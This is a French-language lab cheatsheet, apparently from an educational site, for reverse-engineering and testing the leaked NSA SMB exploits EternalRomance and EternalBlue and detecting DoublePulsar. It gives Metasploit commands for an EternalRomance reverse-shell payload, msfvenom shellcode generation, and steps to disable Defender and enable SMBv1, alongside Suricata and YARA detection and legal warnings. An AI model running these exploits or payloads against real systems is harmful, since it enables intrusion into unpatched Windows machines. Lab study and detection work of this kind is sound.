# 🌑 Pwn the NSA Cheatsheet ## PCtamalou.fr - Reverse-Engineering NSA Exploits ## Par Platon-Y, Nomade du Code ``` ____ ___ ____ _ _______ ____ / ___|_ _/ ___| |/ / ____| _ \ | | | | | | ' /| _| | | | | | |___ | | |___| . \| |___| |_| | \____|____\____|_|\_\_____|____/ ``` Yo, Apache ! Ce cheatsheet est ton katana de poche pour *Pwn the NSA*. Il condense les commandes, outils, et scripts pour reverse *EternalRomance*, *EternalSynergy*, *FuzzBunch*, *DoublePulsar*, et tester *EternalBlue 2025*. Lab only (192.168.56.0/24, article 323-1 CP). Signe le contrat Ă©thique : [/nsa-reverse/contrat_ethique.txt](https://pctamalou.fr/nsa-reverse/contrat_ethique.txt). Ready ? 😈 --- ## 1. Lab Setup | Action | Commande | |-----------------------|-----------------------------------------------| | **Kali (192.168.56.100)** | `sudo ip addr add 192.168.56.100/24 dev eth0` | | **Win7 (192.168.56.101)** | `New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.56.101 -PrefixLength 24` | | **WinServer2016 (192.168.56.102)** | `New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.56.102 -PrefixLength 24` | | **Win10 (192.168.56.103)** | `New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.56.103 -PrefixLength 24` | | **Win11 (192.168.56.104)** | `New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.56.104 -PrefixLength 24` | | **VĂ©rifier connectivitĂ©** | `ping 192.168.56.101` (depuis Kali) | | **DĂ©sactiver Defender** | `sc stop WinDefend` (sur chaque Windows) | | **Activer SMBv1 (Win7/Server)** | `Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol` | | **Snapshot VMs** | VirtualBox : File > Take Snapshot | **Note** : Internal Network, no Internet. Update lab_inventory.txt. --- ## 2. Outils | Outil | Installation | Usage | |----------------------|-----------------------------------------------|--------------------------------------------| | **Metasploit** | `sudo apt install metasploit-framework` | Lancer exploits (`msfconsole`) | | **Ghidra** | TĂ©lĂ©charge : https://ghidra-sre.org/ | Reverse statique (`DoublePulsar.dll`) | | **Radare2** | `sudo apt install radare2` | DĂ©sassembler shellcode (`r2 shellcode.bin`) | | **Immunity Debugger** | TĂ©lĂ©charge : https://www.immunityinc.com (Win7) | DĂ©bogage dynamique (`lsass.exe`) | | **WinDbg** | Windows SDK : https://developer.microsoft.com | DĂ©bogage kernel (`kd -kl`) | | **Scapy** | `pip3 install scapy` | Paquets SMB (`eternalromance.py`) | | **Wireshark** | `sudo apt install wireshark` | Capture SMB (`tcp.port == 445`) | | **Suricata** | `sudo apt install suricata` | IDS (`suricata -r smb.pcap`) | | **YARA** | `sudo apt install yara` | DĂ©tection shellcode (`yara yara_eternal.yar`) | | **Atomic Red Team** | `git clone https://github.com/redcanaryco/atomic-red-team` | Tests (`Invoke-EternalBlue.ps1`) | --- ## 3. Exploits ### EternalRomance (Win7) ```bash # Metasploit msf6 > use exploit/windows/smb/ms17_010_eternalromance set RHOSTS 192.168.56.101 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.56.100 set LPORT 4444 exploit # Custom python3 /nsa-reverse/resources/eternalromance.py ``` ### EternalBlue 2025 (Server2016, Win10, Win11) ```bash # Modifier target/smb_version dans eternalblue_2025.py python3 /nsa-reverse/resources/eternalblue_2025.py ``` --- ## 4. DĂ©tection ### DoublePulsar ```bash python3 /nsa-reverse/resources/doublepulsar_detect.py # VĂ©rifie : cat doublepulsar.log ``` ### Suricata ```bash sudo suricata -c /etc/suricata/suricata.yaml -r /tmp/smb.pcap cat /var/log/suricata/fast.log ``` ### YARA ```bash yara /nsa-reverse/resources/yara_eternal.yar shellcode.bin ``` --- ## 5. Reverse | Action | Commande | |-----------------------|-----------------------------------------------| | **Ghidra** | Importe `DoublePulsar.dll` : `File > Import` | | **Radare2** | `r2 -AAA -d shellcode.bin; afl; pdf @ sym.execute_payload` | | **Immunity Debugger** | Attache `lsass.exe`, `bp srv!SrvOs2FeaListToNt` | | **WinDbg** | `kd -kl; !process 0 0 lsass.exe; bp srv!SrvOs2FeaListToNt; g` | --- ## 6. Shellcode ```bash # GĂ©nĂ©rer msfvenom -p windows/x64/exec CMD=cmd.exe -f raw -o shellcode.bin # IntĂ©grer dans eternalromance.py shellcode = open('shellcode.bin', 'rb').read() # Tester python3 /nsa-reverse/resources/eternalromance.py ``` --- ## 7. DĂ©pannage | ProblĂšme | Solution | |-------------------------|-----------------------------------------------| | **EternalRomance Ă©choue** | VĂ©rifie SMBv1 : `sc.exe query lanmanworkstation`
Active : `net start lanmanserver`
Check patchs : `wmic qfe list | findstr "KB4012212 KB4012215"` | | **Ghidra sans fonctions** | `Analyze > Auto Analyze`, coche "Aggressive Instruction Finder"
Cherche strings : `Window > Defined Strings` | | **Suricata sans alertes** | Vérifie config : `/etc/suricata/suricata.yaml`
Teste PCAP : `suricata -r smb.pcap` | | **EternalBlue 2025 échoue** | Vérifie SMB : `Get-SmbServerConfiguration`
Redémarre : `Restart-Service LanmanServer`
Check EDR : `sc query WinDefend` | --- ## 8. Fichiers - [/nsa-reverse/resources/eternalromance.py](https://pctamalou.fr/nsa-reverse/resources/eternalromance.py) - [/nsa-reverse/resources/doublepulsar_detect.py](https://pctamalou.fr/nsa-reverse/resources/doublepulsar_detect.py) - [/nsa-reverse/resources/suricata.rules](https://pctamalou.fr/nsa-reverse/resources/suricata.rules) - [/nsa-reverse/resources/yara_eternal.yar](https://pctamalou.fr/nsa-reverse/resources/yara_eternal.yar) - [/nsa-reverse/resources/shellcode.bin.txt](https://pctamalou.fr/nsa-reverse/resources/shellcode.bin.txt) - [/nsa-reverse/resources/eternalblue_2025.py](https://pctamalou.fr/nsa-reverse/resources/eternalblue_2025.py) --- ## 9. Éthique Lab only ! Signe [/nsa-reverse/contrat_ethique.txt](https://pctamalou.fr/nsa-reverse/contrat_ethique.txt). Hors lab = 7 ans de prison, 100 000 € d’amende (art. 323-1 CP). --- *“One shot, one kill : sois prĂ©cis, sois Ă©thique.”* — Platon-Y, PCtamalou.fr